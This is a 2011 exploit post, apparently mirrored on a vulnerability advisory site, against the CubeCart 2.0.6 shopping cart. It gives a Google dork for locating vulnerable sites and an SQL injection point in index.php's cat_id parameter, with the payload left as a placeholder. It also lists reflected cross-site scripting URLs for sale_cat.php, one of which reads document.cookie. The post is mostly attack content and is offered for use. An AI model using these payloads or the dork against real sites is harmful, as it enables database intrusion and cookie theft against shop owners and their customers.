Lucene search
SecurityvulnsSECURITYVULNS:DOC:25835HistoryMar 03, 2011 - 12:00 a.m.
CubeCart 2.0.6 SQL injection / Cross Site Scripting
2011-03-0300:00:00
vulners.com
114
##########################################################
Exploit Title: CubeCart 2.0.6 SQL injection / Cross Site Scripting
Google Dork: "Powered by CubeCart 2.0.6"
home : http://www.D99Y.com
Date: 2/3/2011
Author: NassRawI
Software Link: http://www.cubecart.com
Version: 2.0.6
##########################################################
[1] SQL injection
file :
index.php
exploit :
http://localhost/index.php?cat_id= [ SQL injection ]
[2] Cross Site Scripting
file :
sale_cat.php
exploit :
http://localhost/sale_cat.php/" [ XSS ]
http://localhost/sale_cat.php/"<script>alert(12345)</script>
http://localhost/sale_cat.php/"<script>alert(document.cookie)</script>
##########################################################
Greetz :
D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + βDifficult
511 and all members D99Y.CoM
Enjoy :)